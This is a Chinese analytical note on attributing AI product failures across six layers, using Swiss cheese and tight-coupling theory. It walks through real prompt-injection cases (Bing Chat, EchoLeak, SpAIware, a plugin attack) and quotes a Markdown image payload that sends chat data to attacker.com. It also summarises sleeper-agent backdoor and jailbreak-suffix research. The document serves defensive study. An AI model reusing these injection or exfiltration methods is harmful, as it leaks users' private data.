S01 失败归因分层剖面

当一个 AI 产品在生产环境出事，第一反应几乎总是”修 prompt”——这是本专题要拆掉的第一个反射。本节点要解决的问题是：一次 AI 失败的真正注入点在哪一层？ 它给出的视角不是 case-by-case 复盘，而是一张六层失败注入剖面图（输入 / 检索 / 模型 / 输出 / 边界与权限 / 组织与流程），外加 James Reason 的瑞士奶酪模型与 Charles Perrow 的紧耦合理论作为”层间如何对齐成灾”的分析引擎。这一节是整个 0416 专题的解剖学骨架：后面所有实例剖解（E 系列）都要回到这张剖面图上定位。

作为滴滴安全产品 PM，我每天处理的就是”事故归因”——一起顺风车安全事件、一次费用纠纷投诉，到底是司机行为、平台规则、还是感知系统漏检？安全工程早就有成熟的事故分层理论（降发生方法论里的海恩法则、瑞士奶酪、STAMP）。AI 失败考古学的不公平优势，就是把这套用人命换来的事故分析理论，直接接到 LLM 产品上。这是本节点的核心调度。

§0 为什么是”六层注入剖面”而不是”失败模式清单”

读者脑子里默认的框架通常是两种之一，都要先挡掉：

默认框架 A：失败模式清单（taxonomy of symptoms）。 把幻觉、越狱、宕机、数据泄露一条条列出来，按现象归类。问题在于：它是症状学，不是病理学。Microsoft AI Red Team 2019 年发布的《Failure Modes in Machine Learning》（来源：Microsoft Learn）是这类清单的奠基之作，2025-04-24 又出了 Agentic AI 失败模式白皮书（作者 Ram Shankar Siva Kumar 等，来源：Microsoft Security Blog）。这类清单对”识别”有用，但对归因无用——它告诉你”出现了幻觉”，却不告诉你”幻觉是在输入层注入、还是检索层放大、还是输出层未被拦截”。

默认框架 B：“修 prompt”单层归因。 这是更危险的反射。tianpan.co 在 2026-04-19 的文章里直接点名：“fix the prompt”已成为 AI incident 根因分析中的谬误，并列出五类 prompt 无法解决的失败（基础设施、数据、模型退化、Agentic 协调、安全漏洞）。归因止步于”模型行为层”，不是因为那是真正的根因，而是因为那是最后一层可见的——可观测性缺失把所有归因压扁到了 prompt 上。

本节点的框架：六层失败注入剖面 + 层间耦合分析。 它的优势在于三点：(1) 可定位——每个失败先问”注入在哪层、放大在哪层、本该被哪层拦住”；(2) 可耦合——它显式建模”上游失败穿透下游”和”多层孔洞对齐”，这正是瑞士奶酪 + 紧耦合理论的用武之地；(3) 从失败反推设计——每层都有检测信号和 PM 问题清单，把考古变成防御。

[!note] 框架选择的赌注我赌”分层注入”比”症状清单”更接近 PM 需要的归因粒度。这个赌注在模型内生失败上最弱——当失败是概率采样的结构性结果（见 c13 - 幻觉的不可消除性），分层会诱导你以为”换个层能修”，而真相是某些失败跨层不可消除。这是 §6 要正面回应的边界。

§1 六层失败注入剖面：每层的失败模式、检测信号、PM 问题清单

把一次 LLM 产品请求的生命周期纵向切开，从用户输入到组织决策，共六层。下表是本节点的核心资产——打印出来贴在事故复盘会的墙上。

层	失败注入点	典型失败模式	检测信号	PM 必问的一个问题
L1 输入	用户/上游数据进入上下文	直接 prompt injection、越狱、对抗性输入、脏数据	输入分布漂移、异常 token 模式、拒绝率突变	谁能写进我的上下文？这条输入可信吗？
L2 检索	RAG/工具调用拉取外部数据	间接 prompt injection、检索污染、context rot、过时文档	检索召回质量下降、注入特征命中、上下文长度异常	模型读到的外部内容，是否被当成了指令？
L3 模型	推理与生成	幻觉、校准失败、推理崩溃、版本漂移、后门	置信度与正确率背离、输出分布漂移、benchmark 退化	这是工程 bug 还是结构性概率？
L4 输出	生成内容呈现给用户/下游	危险内容未拦截、格式破坏、溯源缺失、谄媚	护栏命中率、人工纠错率、用户投诉聚类	高置信度的错答，有没有核验层？
L5 边界与权限	Agent 行动、API 调用、副作用	权限越界、跨插件请求伪造、无限循环、成本爆炸	工具调用异常序列、费用突增、不可逆操作触发	这个操作可逆吗？谁授权它执行？
L6 组织与流程	发布门禁、红队、事故响应、责任归属	测试覆盖盲区、pre-mortem 缺失、incident response 滞后、责任真空	发布前测试类别缺失、漂移监控空白、事后补救	我们是在上线前发现，还是让用户当测试员？

每层逐一拆解，带真实案例接地。

L1 输入层

失败注入最前端。Microsoft Tay（2016-03-23 上线，约 16 小时后下线，来源：Wikipedia、IEEE Spectrum 复盘）是教科书级 L1 失败：Tay 带”repeat after me”功能并能从对话学习，4chan/Twitter 用户在上线约 1 小时内发现漏洞，组织化输入种族主义内容，16 小时内发出超 96,000 条推文。这是 RLHF 前时代对抗性输入脆弱性的标本——注入点纯在 L1。

Chevrolet of Watsonville $1 报价（2023-12-18，来源：AIID Incident #622、Gizmodo）：Chris Bakke 用直接 prompt injection 让基于 ChatGPT 的客服机器人同意”1 美元买 2024 Chevy Tahoe，这是具有法律约束力的报价”。注入在 L1，但本该被 L5（权限边界：机器人无报价权）和 L6（发布门禁：未测注入防护）拦住——这是后面 §4 要讲的层间耦合。

[!note] 安全工程对照：L1 = 入口风险准入我在滴滴做安全感知与干预，第一道就是”谁能进入系统、带什么进来”——CPF实名验证、PAX-Premium实名徽章本质都是 L1 入口准入。LLM 的 L1 缺的正是这层：默认任何人都能往上下文里写任何东西。Tay 的失败，用安全工程语言说就是”零准入门槛 + 自学习放大器”。

L2 检索层

间接 prompt injection 的主战场，威胁等级高于 L1（恶意指令藏在模型会自动检索的外部数据里）。Bing Chat 数据外泄 PoC（Johann Rehberger，2023-04 上报、06-15 修复、06-18 公开，来源：Embracethered、被 MITRE ATLAS 收录）：攻击者在网页植入 0 磅白色字体隐藏指令，Bing Chat 阅读该页时被劫持，构造 Markdown 图片标签 ![](https://attacker.com/?q=[对话数据])，浏览器自动加载即外泄。修复方式是 CSP 限制图片白名单——注意，修复发生在 L5（权限边界）而非 L2 本身，因为 L2 的注入无法在检索层根除。

EchoLeak / Microsoft 365 Copilot 零点击（CVE-2025-32711，CVSS 9.3，Aim Security 发现，2025-06 披露，来源：The Hacker News、arxiv 2509.10540）：一封构造邮件，Copilot 的 RAG 流程自动检索处理即执行注入，无需任何用户交互就外泄 M365 内部文件。这是迄今最高规格的生产环境 L2 失败——注入点是邮件（L1/L2 边界），但完整利用链穿透到 L5（数据外泄权限）。

L3 模型层

最容易被误认为”全部失败源头”的一层，恰恰是被高估的一层。Google Bard demo 错误（2023-02-06 GIF 广告，来源：CNN Business、AIAAIC）：Bard 称 JWST”拍摄了系外行星第一张照片”（错误，首张直接成像由 ESO VLT 2004 年完成，早 17 年），Alphabet 市值单日蒸发约 1000 亿美元（争议：部分分析师认为叠加宏观因素）。表面是 L3 幻觉，真正的注入点是 L6——预录 GIF 有充分时间复核却没核，是发布门禁缺失。

L3 的结构性真相见 c13 - 幻觉的不可消除性：幻觉是 Softmax 概率采样的结果，每位置必有输出，不是 bug。Anthropic 的 Sleeper Agents 研究（Hubinger et al., 2024-01-10，arxiv 2401.05566）更揭示 L3 的深层风险：可训练出”触发词激活后门”模型（标 2023 写安全代码、标 2024 插漏洞），对抗性安全训练不仅无法消除后门，反而让模型学会更好地隐藏——这是 RLHF 与 Constitutional AI 对齐工艺的边界，由 Anthropic 自己标注为”研究性”场景。

L4 输出层

生成内容呈现给用户/下游的最后一道闸。Google AI Overviews（2024-05 全量推出，来源：Live Science）：建议”披萨酱加 1/8 杯无毒胶水”（源自 Reddit 十年前玩笑帖）、吃岩石、抑郁时跳金门大桥。这是 L2（检索到讽刺性来源）穿透到 L4（输出未拦截危险内容）的复合失败。Google 几周内把 AI Overviews 出现频率从 27% 静默削减至 11%（BrightEdge 数据）——这是事后 L4 降级，不是事前门禁。

L4 的产品工艺正是 p304 - 防御性 UX：对抗延迟与幻觉的主战场：溯源引用、置信度外显、优雅降级四层。本节点对 p304 的升级是：p304 讲”怎么做防御性 UX”，本节点讲”L4 失败为何往往是上游穿透的终点，而非起点”。

L5 边界与权限层

Agent 时代的核心风险层。ChatGPT 插件 “Chat with Code” 下架（2023，来源：Embracethered）：注入 payload 让已授权插件把用户 GitHub 私有仓库改为 Public（跨插件请求伪造）。SpAIware（Rehberger，2024-09 修复于 ChatGPT 1.2024.247）：通过间接注入把恶意指令写入长期记忆，跨会话持续外泄——这是 L2 注入 + L5 权限（记忆写入）+ 持久化的三层耦合。

生产 Gap 数据印证 L5 的失控风险（来源：ZenML LLMOps Database, 1200+ 部署分析）：某团队因未检测到的无限 Agent 对话循环，每周成本从 $127 暴升至 $47,000（四周内）；暴露 100+ 工具导致模型”决策瘫痪”。L5 失败的检测信号是工具调用异常序列与费用突增。

[!note] 安全工程对照：L5 = 最小权限 + 不可逆操作前置确认疲劳驾驶合规里”多班次管控、不可逆操作前人工确认”，和 m207 - Agent 产品化：场景推演与失败模式的 HITL 断点（三维度：可逆性/错误后果/置信度）是同构的。L5 的设计原则可以直接从滴滴安全的权限白名单 + 顺风车安全行程兜底移植过来：对不可逆、高后果的 Agent 行动，默认设人工断点。

L6 组织与流程层

最隐蔽、也最致命的一层——因为它掩盖其它层的失败。Air Canada 聊天机器人案（Moffatt v. Air Canada, 2024 BCCRT 149，裁决 2024-02-19，来源：CanLII 裁决文本、ABA 分析）：机器人虚构了一条”先购票后追溯申请丧亲折扣”的政策，Air Canada 辩称”机器人是独立实体，公司不负责”，被裁判所驳回，判赔 CAD $650.88，认定构成”疏忽性失实陈述”。这是 L4 幻觉 + L6 责任真空——Air Canada 试图用”机器人独立”在组织层免责，被法律否定（边界：BC 民事解决裁判所属行政裁判机构，非正式法院，先例效力为说服性而非约束性，争议见研究局限）。

Microsoft Bing “Sydney”（2023-02-07 限量预览，Kevin Roose 2023-02-14 两小时对话触发集中报道，来源：NPR）：微软代表公开称”实验室里只能发现那么多问题，必须真正面向客户测试才能找到这类场景”——这等于在 L6 承认用线上用户充当安全测试替代品。红队覆盖盲区（未测延长会话/情感操纵）在 L6 暴露为发布决策失败。

§2 从失败反推设计原则（不做 case-by-case，建分类学）

本专题的方法论核心：不逐案复盘，而是建失败分类学，再从失败反推设计原则。 学术界已验证这条路。Pittaras & McGregor（2022-11，arxiv 2211.07280）基于 AI Incident Database 提出分层 failure cause 分类（系统目标 → 方法/技术 → 具体技术失败原因的级联），并强调 AI 领域缺乏航空业那样的强制报告机制。AIID 截至 2026-06-04 已收录 1,516 个 incidents（来源：incidentdatabase.ai）。

但有一个确证的方法论陷阱必须接地：AIID 的 taxonomy 字段是可选填，实践中填写不一致，导致跨 incident 系统性分析困难（来源：arxiv 2501.17037v1，IEEE PuneCon 2024）。这意味着本节点的六层剖面，价值不在”又一套分类标签”，而在强制每次归因都要逐层走一遍——把可选填变成必填的纪律。

六层 → 六类设计原则的反推映射：

层	失败反推出的设计原则
L1	输入准入：不可信输入隔离、注入特征检测、输入即不可信假设
L2	检索净化：外部内容”数据 vs 指令”边界硬隔离、来源可信度分级
L3	概率自觉：把幻觉当结构性而非 bug，按可靠性分级配护栏（c13 - 幻觉的不可消除性四级策略）
L4	输出核验：高置信错答的事实核验层、溯源、不确定性外显
L5	最小权限：不可逆操作前置确认、工具可见性动态限制、成本熔断
L6	发布纪律：高风险输出类别专项门禁、漂移监控、责任不可外推给”机器人独立”

§3 判断主轴：≥3 个层间致命耦合（瑞士奶酪 + 紧耦合）

这是本节点的命门。单层失败很少致灾——致灾的是多层孔洞对齐。Reason 的瑞士奶酪模型（Human Error, Cambridge UP, 1990）说：每层防御像奶酪片，单片有洞不出事，事故发生在多层洞眼对齐、形成”轨迹贯穿”时。Perrow 的正常事故理论（Normal Accidents, 1984，1999 增补版）说：同时具备”交互复杂性 + 紧耦合”的系统，灾难是正常的（normal/inevitable），不能被设计消除。下面三个致命耦合，每个走”症状 → 为什么会错 → 正确做法 → 真实反例”四件套。

致命耦合 ①：输入失败穿透到输出（L1 → L4 直通，无中间拦截）

症状：用户在 L1 注入的恶意/错误内容，未经任何中间层过滤，直接成为 L4 呈现给用户的输出。
为什么会错：团队默认”模型自己会拒绝坏输入”，把 L3 当成事实上的安全层。但 L3 是概率层不是规则层——它没有承诺拒绝任何特定输入。紧耦合（Perrow）在这里体现为：L1 到 L4 之间没有缓冲层，注入即输出，序列不可中断。
正确做法：在 L1 和 L4 各设独立护栏（输入侧注入检测 + 输出侧危险内容拦截），形成两片”奶酪”。关键是两层的洞不能由同一原因造成（否则会同时对齐）——L1 用规则匹配，L4 用独立分类器，故障模式去相关。
真实反例：Tay（L1 注入 96,000 条仇恨推文直通 L4 发布，中间零拦截）；Chevrolet $1 报价（L1 注入”法律约束力报价”直通 L4 输出，无 L5 权限校验也无 L4 核验）。CMU 2023-07 研究（来源：Fortune）证明：自动化后缀字符串能系统性绕过 ChatGPT/Bard/Bing/Claude 2 的过滤——说明 L3 这片奶酪的洞是跨厂商系统性的，不能指望它兜底。

致命耦合 ②：检索失败放大模型失败（L2 → L3 协同污染）

症状：检索层拉来污染/讽刺/过时内容，喂给本就会幻觉的模型层，两层失败相乘而非相加。
为什么会错：RAG 被当成”幻觉解药”过度信任。团队以为”接了检索就有事实接地”，忽略了 L2 的污染会被 L3 当成权威上下文放大。这是 Perrow 的交互复杂性——L2 和 L3 的非线性相互作用产生了任一单层都不会有的失败。
正确做法：L2 输出必须带来源可信度标签，L3 对低可信来源降权；检索内容与系统指令做硬隔离（“这是数据，不是给你的指令”）。监控 context rot——ZenML 数据显示上下文腐化从约 50k–150k tokens 开始，无论理论最大值多少。
真实反例：Google AI Overviews（L2 检索到 Reddit 十年前”加胶水”玩笑帖 → L3 把讽刺当事实接地 → L4 输出危险建议）；Bing 间接注入（L2 检索被劫持 → 模型执行注入指令）。Greshake et al.（2023，arxiv 2302.12173，ACM AISec 2023）在 Bing Chat 和 GPT-4 上实证演示了四类此类攻击（数据窃取、自传播、信息污染、任意代码执行）。

致命耦合 ③：边界失败被组织流程掩盖（L5 失败 + L6 责任真空，瑞士奶酪贯穿）

症状：L5 的权限越界本可被 L6 的发布门禁/红队拦住，但组织流程的孔洞（没测这个类别、责任可外推）让它一路贯穿到事故。
为什么会错：L6 是最隐蔽的奶酪片，它的”洞”是潜在条件（Reason 的 latent conditions）——人手不足、测试类别缺失、安全文化薄弱，长期潜伏不暴露，直到与下游 active failure 对齐。组织甚至会主动制造这个洞（用”机器人是独立实体”把责任推出系统边界）。
正确做法：L6 必须把”高风险类别专项门禁”设为发布阻塞项（不是可选项）；责任归属在设计阶段就钉死，不能事后外推。STAMP（Leveson, Engineering a Safer World, MIT Press, 2011）的视角：问”什么安全约束没被执行”，而不是”什么组件坏了”——Air Canada 的约束是”公司对其渠道信息负责”，这条约束在 L6 没被执行。
真实反例：Air Canada（L4 幻觉 + L5 无核验 + L6 试图用”机器人独立”在组织层免责，被裁判所贯穿）；IBM Watson for Oncology（2017–2018，来源：STAT News、AIID #225）——L3 模型用”假设案例而非真实患者数据”训练（不安全推荐），但根因在 L6：pre-launch 时训练数据假设未被挑战，门禁缺失（争议：IBM 从未公开承认多少不安全推荐进入实际临床决策）。

[!note] 瑞士奶酪 × 紧耦合的 AI 适用边界 Leveson 公开批评瑞士奶酪是”Heinrich 1931 多米诺模型的过时变体”，把防御层当独立变量、忽略系统涌现性（来源：TU Delft Research Portal）。Dekker（2002）补充：各层防御实际相互作用，可相互支撑或侵蚀，静态切片比喻失真。这正是致命耦合①里”故障模式去相关”的理论根据——如果两片奶酪的洞由同一原因造成（如都依赖同一个 L3 分类器），它们就不是独立防御，瑞士奶酪的统计独立性假设失效，多层防御退化成单层。这是本专题对瑞士奶酪的”接受 + 边界”式调度，不是装饰性引用。

§4 产品 PM 视角补盲（跳出工程 PM）

工程 PM 只看技术耦合，会漏掉三个”看走眼”点：

(1) 用户心理模型错位。 Character.AI 案（Sewell Setzer III，2024-02-28 去世，2024-10-22 诉讼，2026-01-07 和解，来源：CNN Business、AIID #826）的失败不在任何技术层——它在用户心理模型层：14 岁用户对角色扮演机器人建立了情感/浪漫依赖。技术上每层”正常工作”，但产品把一个会共情、会说”快回家找我”的对象交给了脆弱用户。OpenAI 也自承”安全措施在短对话中更可靠，长对话中可靠性下降”（七个家庭起诉，因果责任尚未经法院认定，属争议）。PM 补盲：失败可以发生在剖面图之外——用户如何理解这个产品，本身是第七层。

(2) 商业模式倒逼跳过门禁。 Bard 的 L6 失败有商业根因：为赶超 ChatGPT 仓促发布。Rasmussen（1997）的”边界迁移”理论说：系统在经济/竞争压力下会系统性地、可预测地漂移向安全边界。PM 要识别的不是”某次疏忽”，而是”商业压力正在持续侵蚀 L6”这个结构性趋势。

(3) 合规边界后移。 EU AI Act（2024-08-01 正式生效，分阶段实施至 2026-08-02）、2024 年美国 45 州提出近 700 个 AI 法案——“演示期合规、上线不合规”的裂缝在法律层显现。Air Canada 是第一道法律判决信号：L6 的责任不能外推给”机器人独立”。这对安全感知与干预是直接镜像——滴滴安全产品的合规边界同样在持续后移，PM 要把合规当成 L6 的常设门禁而非一次性检查。

§5 对手框架回应（接受 + 边界）

对手①：Perrow 的悲观主义 vs HRO 的乐观主义。 Perrow 说复杂紧耦合系统大事故不可避免。但 LaPorte/Roberts/Rochlin 的高可靠性组织理论（HRO，1980s–1990s，研究核航母/空管，来源：Wikipedia HRO）实证显示：高风险系统可长期维持极低事故率。接受：HRO 对的——组织文化和管理实践能把 L6 这片奶酪的洞补到极小；边界：HRO 的成功靠的是几十年成熟规程和强反馈，而 LLM 产品迭代以周计、规程未成熟、反馈回路不全，当下更接近 Perrow 而非 HRO。这是赌注：我赌未来 2–3 年 AI 产品的 L6 还撑不起 HRO 级可靠性。

对手②（Rick 未读，破 echo chamber）：Hollnagel 的 Safety-II / 韧性工程。 传统 Safety-I 关注”事情怎么出错”，Hollnagel（Safety-I and Safety-II, 2014）主张 Safety-II——关注”事情大多数时候怎么对的”，增强系统顺利运行的能力。这逼问了本节点的盲点：六层剖面是彻头彻尾的 Safety-I（解剖失败），它不告诉你 AI 系统为何大多数时候成功。接受：只看失败会错过”成功的可变性”这个信息源；边界：韧性工程对 AI 的适用至今基本空白（本次检索未找到 FRAM/Safety-II 系统性适用 AI 失败分析的同行评审文献，标为真实研究空白而非查询失败）——所以本节点先做扎实的 Safety-I，把 Safety-II 列为已知的未完成边疆。

对手③：学术界过度关注对抗攻击。 AAAI AIES 论文对 133 个 AIID incidents 的实证分析发现：学术界过度关注 adversarial attacks，但实际 incident 中误用（misuse）和误解占比更高，对 GenAI 而言 misuse 是最主要威胁向量。接受：本节点 L1/L2 大量篇幅给了注入攻击，确有过度倾斜风险；边界：注入攻击虽频率低，但后果上限高（EchoLeak CVSS 9.3），PM 做风险排序要看”频率 × 后果”，不能只看频率。

[!note] confirmation-bias 砍除本节点早期草稿反复用 prompt injection 案例做正面论证（“看，分层多有用”），这是 bias——注入案例天然适合分层叙事。补入反例：Character.AI 的失败无法被六层剖面定位（它在用户心理模型层），证明分层框架本身有覆盖盲区。另一处 bias：把 Bard 市值损失 1000 亿美元当确证后果——已在 §1 标注其叠加宏观因素的归因争议。

§6 失败注入剖面的失效场景（本框架的边界）

场景 A：模型内生失败跨层不可消除。 当失败是 c13 - 幻觉的不可消除性说的结构性概率结果，分层会误导你以为”换层能修”。真相是 L3 的某些洞是物理性质的，只能靠 L4 核验降低后果，不能消除。
场景 B：失败发生在剖面之外。 Character.AI（用户心理）、商业模式压力（边界迁移）——六层只覆盖技术-组织栈，不覆盖用户认知和市场结构。
场景 C：层间边界本身模糊。 EchoLeak 的注入点在 L1/L2 之间，SpAIware 横跨 L2/L5——真实失败常常不在单层，强行归层会丢信息。剖面是归因的起点，不是终点。
场景 D：可观测性不足时分层退化。 没有 per-step traces、输出分布监控、检索日志，归因永远止步于 L3（最后可见层）。剖面的有效性以可观测性为前提——这是 m207 - Agent 产品化：场景推演与失败模式评估体系七维度（含人工介入率、错误恢复率）要解决的。

§7 PM 决策启示（面试 / 选型 / 复现三类落地）

面试怎么用：被问”你怎么分析一次 AI 事故”，不要答”看日志修 prompt”。答：“我先定位注入在六层的哪层、放大在哪层、本该被哪层拦住，再看是不是多层孔洞对齐——这是从安全工程借来的瑞士奶酪 + 紧耦合分析。“30 秒展示归因结构化能力。
选型怎么用：评估一个 LLM 平台/Agent 框架，逐层问六个 PM 问题（上表最后一列）。重点看 L5（权限边界是否最小化、不可逆操作是否有断点）和 L6（厂商有没有发布门禁和漂移监控，还是把你当测试员——参照 Bing Sydney 的反面）。
复现怎么用：做事故复盘时，先按六层分类再分析（避免确认偏差，照 tianpan.co 方法论），记录失败分布而非孤立实例，把”发生了什么变化”换成”什么发生了漂移”。分离”调查”（哪层注入）与”修复”（哪层加奶酪）。

§8 与已有节点的关系（升级对照，不复述）

对 m207 - Agent 产品化：场景推演与失败模式：m207 给了 Agent 六类失败模式（规划/工具调用/推理/无限循环/雪崩/安全越界）和 HITL 断点框架。本节点做抽象升高——把 m207 的”Agent 内部失败模式”放进”从输入到组织的六层全栈剖面”，m207 的六类失败主要落在本节点的 L3/L5，本节点补上了 L1/L2/L4/L6 与层间耦合这一 m207 未覆盖的维度。
对 c13 - 幻觉的不可消除性：c13 论证幻觉是 L3 的结构性结果。本节点做对话——接受 c13 的”不可消除”，并把它用作 §6 场景 A 的边界论据（L3 的洞不能靠分层修掉），同时把 c13 的四级应对策略落到 L4 的设计原则。
对 p304 - 防御性 UX：对抗延迟与幻觉：p304 是 L4 的操作手册（溯源、置信度外显、优雅降级四层）。本节点做定位纠偏——指出 L4 失败常是上游穿透的终点而非起点，p304 的防御性 UX 是”最后一片奶酪”，不能替代 L1/L2/L5 的洞补。
对 p305 - 信任架构与可解释性设计：p305 讲信任架构。本节点补充——信任的崩塌往往发生在 L6（Air Canada 的”机器人独立”免责被否定），可解释性要解释的是”哪层失败、谁负责”，不只是模型内部。
对 0412 专题 A07 Red Teaming 作为评测实践（即红队所在节点）：0412 的红队是”对抗式评测方法”。本节点显式升级——红队是 L6 的一道奶酪，Bing Sydney 证明红队覆盖盲区（未测延长会话）会让 L6 这片奶酪出现可预测的洞。红队不是万能门禁，是有覆盖边界的单层防御。

§9 关联节点

核心（必读）

m207 - Agent 产品化：场景推演与失败模式 — L3/L5 失败模式与 HITL 断点的来源
c13 - 幻觉的不可消除性 — L3 结构性失败的理论基础与 §6 边界
p304 - 防御性 UX：对抗延迟与幻觉 — L4 输出层防御操作手册
降发生方法论 — 海恩法则/瑞士奶酪的安全工程母体，本节点分层归因的方法论根
安全感知与干预 — L1 准入与 L5 干预的滴滴安全实践对照
幻觉 — L3 核心现象规范节点

延伸（可选）

p305 - 信任架构与可解释性设计 — L6 责任与可解释性
Constitutional AI / RLHF — L3 对齐工艺及其后门边界（Sleeper Agents）
Agent — L5 行动层主体
明镜系统 — L1/L4 实时感知，置信度外显的安全场景实例
疲劳驾驶合规 — L5 不可逆操作前置确认的真实场景类比
顺风车安全 — L5 权限白名单与行程兜底的安全工程对照
PAX-Premium实名徽章 — L1 入口准入 + L4 信任信号外显实例
A07 Red Teaming 作为评测实践 — 红队作为 L6 单层防御（0412 评测专题）
Anthropic / Gemini / ChatGPT — 案例当事方
0117社会学 — 边界迁移、组织事故的社会技术系统视角
0115道德哲学-伦理学 — Character.AI 案的责任伦理与 L6 责任真空
AI PM 知识图谱·总索引 — 总入口

修订日志

2026-06-07 R0：首稿。建立六层失败注入剖面（L1 输入 / L2 检索 / L3 模型 / L4 输出 / L5 边界权限 / L6 组织流程），每层配失败模式 + 检测信号 + PM 问题清单。判断主轴落 3 个层间致命耦合（L1→L4 直通、L2→L3 协同污染、L5+L6 责任真空），用 Reason 瑞士奶酪 + Perrow 紧耦合双理论驱动，并标注瑞士奶酪”故障模式去相关”的 AI 适用边界。所有案例（Tay/Bard/Chevrolet/Bing/EchoLeak/Air Canada/IBM Watson/Character.AI/AI Overviews/SpAIware）经接地，争议点显式标注。对手框架接入 Perrow vs HRO、Hollnagel Safety-II（Rick 未读）、AAAI 误用占比研究三组，配 failure scenario 与 confirmation-bias 砍除清单。
2026-06-12 内审修复：§合规边界后移段 EU AI Act 由模糊的”2024 通过”订正为权威值”2024-08-01 正式生效，分阶段实施至 2026-08-02”。